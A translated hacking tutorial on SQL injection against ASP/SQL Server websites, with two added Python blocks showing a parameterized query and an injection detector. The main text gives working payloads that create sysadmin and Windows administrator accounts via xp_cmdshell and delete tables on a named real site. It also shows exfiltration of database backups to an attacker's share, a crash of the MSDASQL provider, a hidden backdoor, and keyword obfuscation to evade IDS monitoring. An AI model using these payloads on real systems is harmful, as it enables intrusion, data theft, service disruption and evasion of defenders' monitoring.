Many news, BBS and e-commerce sites are built on ASP plus SQL Server, and many of the programmers writing ASP are fresh graduates, so attacks on ASP/SQL have a relatively high success rate. This kind of attack has little to do with the NT version or the SQL Server version, and there is no patch for it, because the hole is created by the programmer; most ASP programming books carry sample code with exactly this hole. In fact the attack is nothing more than a few legitimate-looking ASP requests to SQL Server, and it leaves little behind.

This attack method originated with the OR 1=1 hole (we call it a vulnerability). I think everyone knows that one by now. The next step was to execute something like

news.asp?id=2;exec sp_addlogin hax

(which adds a login named hax to the database), but that method has two limitations. First, the SQL Server account used by the ASP page must be an administrator. Second, the submitted variable must be the final part of the whole SQL statement, because some programmers query the database like this:

select * from news where id=... and topic=... and ...

With that kind of query, the request above becomes

select * from news where id=2;exec sp_addlogin hax and topic=... and ...

so there is still an AND clause hanging after the stored procedure call, which is a syntax error, and sp_addlogin never runs. So try the following instead:

news.asp?id=2;exec sp_addlogin hax;--

The trailing -- turns the rest of the statement into a comment; there is no syntax error any more and sp_addlogin executes normally. The whole sequence is then:

news.asp?id=2;exec master.dbo.sp_addlogin hax;--
news.asp?id=2;exec master.dbo.sp_password null,hax,hax;--
news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin hax;--
news.asp?id=2;exec master.dbo.xp_cmdshell 'net user hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--

This leaves a hax administrator account in both the database and the operating system. Of course the precondition is that the ASP page connects with the administrator account, so don't bother trying this on virtual hosting; you won't find that hole there. Whether we can get in when the other side's ASP is not using the SQL administrator account, and of course the question of an intrusion over port 1433, we will discuss later. You can try appending a ' after id=2 and watch what comes back; it mainly shows you how the other side's ASP was written. Next let's talk about what to do when the SQL account used by the ASP program is not an administrator.
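As an added example (not code from the original article), here is the vulnerable concatenation described above beside its hardened form, in Python with an in-memory sqlite3 database standing in for the ASP page and SQL Server. It assumes that sqlite3's executescript behaves like a driver that runs the whole batch, and the "delete news" request from later in the article is written as "delete from news" because sqlite requires the FROM.

```python
import re
import sqlite3

def fresh_db():
    # Constructed stand-in for the site's news table (sqlite3, not SQL Server).
    db = sqlite3.connect(":memory:")
    db.executescript(
        "create table news(id integer, topic text, body text);"
        "insert into news values(1,'a','first'),(2,'b','second');"
    )
    return db

def unsafe_lookup(db, id_param, topic="b"):
    # The page's pattern: the request variable is pasted into the statement
    # and further AND clauses follow it. executescript stands in for a driver
    # that executes the whole batch, so stacked statements all run and a
    # trailing '--' comments out the clauses after the injected part.
    sql = f"select * from news where id={id_param} and topic='{topic}'"
    db.executescript(sql)
    return db.execute("select count(*) from news").fetchone()[0]

ID_RE = re.compile(r"[1-9][0-9]{0,9}")

def safe_lookup(db, id_param, topic="b"):
    # Hardened form: whitelist the id as a positive integer, then bind it as
    # a parameter so the value can never become part of the statement text.
    if not ID_RE.fullmatch(id_param):
        raise ValueError("id must be a positive integer")
    return db.execute(
        "select id, topic, body from news where id=? and topic=?",
        (int(id_param), topic),
    ).fetchall()

def demo():
    # Constructed request value in the style of the article's examples.
    payload = "2;delete from news;--"
    remaining = unsafe_lookup(fresh_db(), payload)   # the table is emptied
    db = fresh_db()
    try:
        safe_lookup(db, payload)
        rejected = False
    except ValueError:
        rejected = True                              # the payload never reaches SQL
    return remaining, rejected, safe_lookup(db, "2")
```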
For example, a news page on the Talent site looks like this:

http://www.talent.com.cn/news/news-2.asp?newid=117

You can try

http://www.talent.com.cn/news/news-2.asp?newid=117;select 123;--

Oh, it reports a syntax error, and the error mentions SELECT 123, which is quite telling. Then

http://www.talent.com.cn/news/news-2.asp?newid=117;delete news;--

Haha, as long as the table name is guessed right, the news table is gone. Even when the SQL account used by the ASP is not an administrator, it will still be the owner of a database, which means it at least has high privileges on that one database. But how do we find out which database that is? Look at the db_name() function. Open your Query Analyzer and run print db_name(): huh, the name of the current database comes straight out. So, along the same lines:

declare @a sysname;set @a=db_name();backup database @a to disk='\\<your IP>\<your shared directory>\bak.dat',name='test';--

Oh, the other side's current database is backed up onto your hard disk, and the rest is up to you.

This method can also be used to find the other side's SQL Server IP. First set your firewall to alert on ICMP and on TCP 139 and 445, then try

news.asp?id=2;exec master.dbo.xp_cmdshell 'ping <your IP>'

If the firewall tells you someone is pinging you, then you can be sure the other side's ASP runs with SQL administrator privileges, and you have also pinned down exactly where their SQL Server sits, because many large sites separate the web server and the database server for performance. When the other side is patched and you cannot see the source code, I think this is the only way to quickly locate their SQL Server. And if the ASP does not have SQL administrator privileges, so that we cannot call xp_cmdshell, what then? Don't worry, try this:

news.asp?id=2;declare @a sysname;set @a=db_name();backup database @a to disk='\\<your IP>\<your shared directory>\bak.dat',name='test';--

Oh, your firewall should warn that someone is connecting to your port 445 or 139 (Win9x uses 139), so the other side's SQL Server IP is exposed just the same. And if the account is not even the owner of the database? Next time I will tell you a better way.
In fact backup database is a bit of a stretch. If the other side's database is very large and you are on dial-up, huh, I'd advise you not to try it; the transfer is unlikely to succeed.

Next we will talk about how to deceive an IDS while carrying out an ASP/SQL intrusion. Some of the better IDS products have started watching for keywords such as xp_cmdshell. Comrades, next time.

All the URLs above I hope everyone submits through VBScript rather than the address bar, because the browser's address bar mangles some special characters and your command may not be transmitted in full:

window.location.href = url

Supplement: this issue has been raised on the web before, but only for a few simple xp_cmdshell calls; in fact there are many places worth digging into. For example www.guosen.com.cn, a securities company's site, has this problem. They use Microsoft's three-tier structure, and the earlier xp_cmdshell approach fails because the string is filtered, but I tried it, and using SQL Server's heterogeneous queries I could still open a Telnet service on their machine and add an account to the administrators group! Since their firewall is a tightly configured Check Point with only port 80 open, it is hard to get at their database structure, but there is still a way :p By the way, pay attention to SQLOLEDB, db_name(), OpenRowSet and OpenDataSource: when the ASP's SQL Server account is just an ordinary user, these system functions come in handy!

SQL Server new vulnerabilities and a few tricks

I have to talk about some new SQL Server bugs. Although I worked hard for them, I was of course also a bit lucky to find them; I don't dare keep them to myself, so I am putting them out for everyone to check. Of course some masters probably already know them; after all, I have been working with SQL Server for less than a year :P
1. About OpenRowSet and OpenDataSource

Maybe this is already a known trick: using OpenRowSet to run local commands. The usual usage (including MSDN's listing) is

select * from openrowset('SQLOLEDB','myserver';'sa';'','select * from table')

As you can see (even from the literal sense of the name), OpenRowSet is just a fast way of accessing a remote database, and it must be followed by a select, i.e. it needs a recordset to return. So can we use it to call xp_cmdshell? The answer is yes:

select * from openrowset('SQLOLEDB','server';'sa';'','set fmtonly off exec master.dbo.xp_cmdshell ''dir c:\''')

SET FMTONLY OFF must be added to override the default setting of returning column information only, so that the result set produced by xp_cmdshell is handed back to the outer select for display. With the default setting an empty set comes back, the select errors out and the command is not executed.

So what if we want to call sp_addlogin, which, unlike xp_cmdshell, returns no result set at all? Then we can no longer rely on FMTONLY, but we can do this:

select * from openrowset('SQLOLEDB','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hectic')

This returns at least the result set of select 'OK!', so your machine displays OK!, and the other side's database gains a hectic login. In other words, we use the result set of select 'OK!' to fool the local select request, and the command executes normally. The same works for sp_addsrvrolemember, and you can do the same with OpenDataSource. As for the real use of this method, everyone can think about it :P

2. The MSDASQL crash

I don't know whether you have tried connecting to a remote database via MSDASQL. Of course this provider can only be called by a SQL Server administrator. Run

select * from openrowset('MSDASQL','DRIVER={SQL Server};SERVER=server;ADDRESS=server,1433;UID=sa;PWD=;DATABASE=master;NETWORK=DBMSSOCN','select * from table1 select * from table2')

When table1 and table2 have different numbers of columns, you will find that the other side's SQL Server crashes: even local connections fail and the system resources are eaten up. After killing the SQL Server process with pskill, if the machine is not restarted SQL Server will not start normally, or keeps reporting illegal operations. I just happened to find this bug and have not looked into the exact cause; strangely, it only appears with MSDASQL, SQLOLEDB has no such problem. So it seems the problem is not really the mismatch between the number of result sets and the number returned; it should be MSDASQL itself. Let's study the exact reason together :P

3. The terrible back door

I have seen people on the Internet say that after taking SQL Server you can leave a back door by adding triggers or jobs, or by rewriting sp_addlogin and sp_addsrvrolemember. These methods certainly work, but they are easy to discover.
I don't know whether you have thought about the local connection mapping of SQLOLEDB. Oh, for example, run the following command on the other side's SQL Server with a SQL Server administrator account:

select * from openrowset(... Data Source=hectic ..., 'set fmtonly off exec master ...

A local connection mapping named hectic is thereby established on the other side's SQL Server. As long as SQL Server is not restarted this mapping persists, and at least I don't know of any way to find a connection mapping created by someone else. Well, once the above command has run, you will find that the guest user, which has no permissions at all, can run the above command too! And with LocalSystem privileges (in a default installation)! Huh, this method can be used to leave a back door on a SQL Server that has already been taken with administrator privileges.

The above method works on SQL Server 2000 and SQL Server 2000 SP1!

* One more guess. I don't know whether you have paid attention to the two DSNs that come with Windows: one is LocalServer, the other is MQIS. Both connect to SQL Server with the local administrator account. If the other side's SQL Server service is started under a custom Power User account, then sa's permissions amount to those of a Power User and it is hard to do much. But through the following command

select * from openrowset('MSDASQL','DSN=LocalServer;Trusted_Connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:\''')

the local SQL Server would be connected using the account behind the DSN, and local commands would then run under that account; I think this should break through the limits of an sa that is only a Power User. The current problem is that SQLOLEDB cannot use a DSN connection, and MSDASQL does not let non-administrators call it, so I am looking for a way for guest to call MSDASQL. If someone knows how to break through this, or has a new idea, let's discuss it together. If it could be used successfully as guest, it would be a very serious security vulnerability, because any of the SQL statements we mentioned earlier could be submitted to the other side's ASP for it to execute for us :p

Using T-SQL to deceive or attack IDS

IDS products are getting smarter and smarter.
IDS has added monitoring for xp_cmdshell and sp_addlogin, but after all there is no such thing as artificial intelligence, and this kind of monitoring always feels like it can be deceived. Since IDS monitors the keyword xp_cmdshell, we can do

declare @a sysname
set @a='xp_'+'cmdshell'
exec @a 'dir c:\'

I think everyone can understand this code. Also, xp_cmdshell, being a stored procedure, has an id number in the master database, and that id is fixed; suppose this id is 988456, then

declare @a sysname
select @a=name from sysobjects where id=988456
exec @a 'dir c:\'

and of course also

declare @a sysname
select @a=name from sysobjects where id=988455+1
exec @a 'dir c:\'

Permute and combine these and there is no way an IDS can monitor everything.
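To show the defender's side of the IDS discussion above, here is an added example (not code from the original article) in Python: it normalizes the id= value of constructed request lines, undoing URL encoding and the two name-hiding tricks described, and reports structural signs of injection rather than bare keywords. The request lines, the RISKY_NAMES list and the finding labels are my own constructions.

```python
import re
from urllib.parse import unquote

# Procedure and function names the article shows being abused from a request
# parameter that should only ever carry a news id.
RISKY_NAMES = ("xp_cmdshell", "sp_addlogin", "sp_password", "sp_addsrvrolemember",
               "openrowset", "opendatasource", "backup database", "db_name")

# Rejoins 'xp_'+'cmdshell' style string-literal concatenation.
JOIN = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

def normalize(value):
    """Undo URL encoding (twice), case and whitespace games, and literal joins."""
    s = unquote(unquote(value)).lower()
    s = re.sub(r"\s+", " ", s)
    while JOIN.search(s):
        s = JOIN.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
    return s

def findings(value):
    """Return the reasons a single id= value looks like T-SQL injection."""
    s = normalize(value)
    hits = []
    if re.search(r";\s*(exec|execute|declare|select|delete|backup)\b", s):
        hits.append("stacked-statement")       # the ';exec ...' batch trick
    if "--" in s or "/*" in s:
        hits.append("comment-terminator")      # the '--' that swallows trailing ANDs
    hits += [n for n in RISKY_NAMES if n in s]
    if re.search(r"from sysobjects where id\s*=", s):
        hits.append("sysobjects-name-lookup")  # procedure name resolved by object id
    if re.search(r"exec\s+@\w+", s):
        hits.append("exec-via-variable")       # EXEC @a hides the procedure name
    return hits

def scan_requests(lines):
    """Map line index -> findings for every request whose id= value is suspicious."""
    out = {}
    for i, line in enumerate(lines):
        m = re.search(r"\?id=(\S*)", line)
        hits = findings(m.group(1)) if m else []
        if hits:
            out[i] = hits
    return out

# Constructed sample access-log request lines (not real traffic).
SAMPLE = [
    "GET /news.asp?id=117 HTTP/1.0",
    "GET /news.asp?id=2;exec%20master.dbo.sp_addlogin%20hax;-- HTTP/1.0",
    "GET /news.asp?id=2;declare%20@a%20sysname%20set%20@a='xp_'%2B'cmdshell'%20exec%20@a%20'dir%20c:%5C' HTTP/1.0",
    "GET /news.asp?id=2;declare%20@a%20sysname%20select%20@a=name%20from%20sysobjects%20where%20id=988455%2B1%20exec%20@a%20'dir%20c:%5C' HTTP/1.0",
]
```

The fourth sample line contains no monitored keyword at all, which is exactly the article's point; the structural checks (stacked statement, sysobjects lookup, EXEC through a variable) still flag it.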